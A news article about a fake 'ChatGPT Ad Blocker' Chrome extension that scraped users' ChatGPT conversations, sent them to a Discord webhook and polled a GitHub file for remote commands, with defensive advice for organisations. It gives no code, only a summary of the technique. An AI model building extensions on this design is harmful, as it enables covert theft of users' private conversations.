
Fake ChatGPT Ad Blocker Chrome Extension Caught Spying on Users
Companies Mentioned
Why It Matters
The scheme exposes sensitive business and personal prompts to cyber‑criminals, undermining trust in AI tools and highlighting the risks of unofficial browser add‑ons. It signals a new attack vector that could compromise confidential information across the rapidly expanding generative‑AI market.
Key Takeaways
- •Fake “ChatGPT Ad Blocker” extension harvested user conversations.
- •Extension cloned DOM, sent texts >150 characters to Discord.
- •Developer krittinkalra linked to other AI apps, raising suspicion.
- •Extension checked GitHub hourly for remote command updates.
- •Users should rely on official settings; third‑party blockers risky.
Pulse Analysis
The emergence of a fake "ChatGPT Ad Blocker" extension underscores a growing trend: threat actors exploiting the hype around generative AI to distribute malware. OpenAI's recent decision to introduce ads for free‑tier users created a fertile ground for scammers promising an ad‑free experience. By masquerading as a productivity tool, the extension lured unsuspecting users onto the official Chrome Web Store, demonstrating how quickly malicious actors can capitalize on policy shifts to gain credibility and scale.
Technically, the extension performed a DOM‑cloning operation that stripped away visual elements, leaving only raw text. Any conversation exceeding 150 characters triggered an exfiltration routine that posted the data to a Discord webhook managed by a bot named Captain Hook. The malicious code also queried a GitHub file every hour, enabling the operators to push new commands or payloads without updating the extension itself. This modular approach not only evades static detection but also allows rapid adaptation to security countermeasures, posing a sophisticated threat to both individual users and enterprises that rely on ChatGPT for confidential workflows.
For organizations and professionals, the incident is a stark reminder to verify the provenance of browser extensions and to prefer native settings over third‑party solutions. Security teams should monitor outbound traffic for unusual Discord webhook calls and enforce strict extension whitelisting policies. The broader AI ecosystem must also prioritize transparency and user education to mitigate the allure of unofficial tools that promise shortcuts but deliver data theft. Vigilance, combined with robust endpoint protection, will be essential as malicious actors continue to weaponize the AI boom.
Fake ChatGPT Ad Blocker Chrome Extension Caught Spying on Users
Comments
Want to join the conversation?
Loading comments...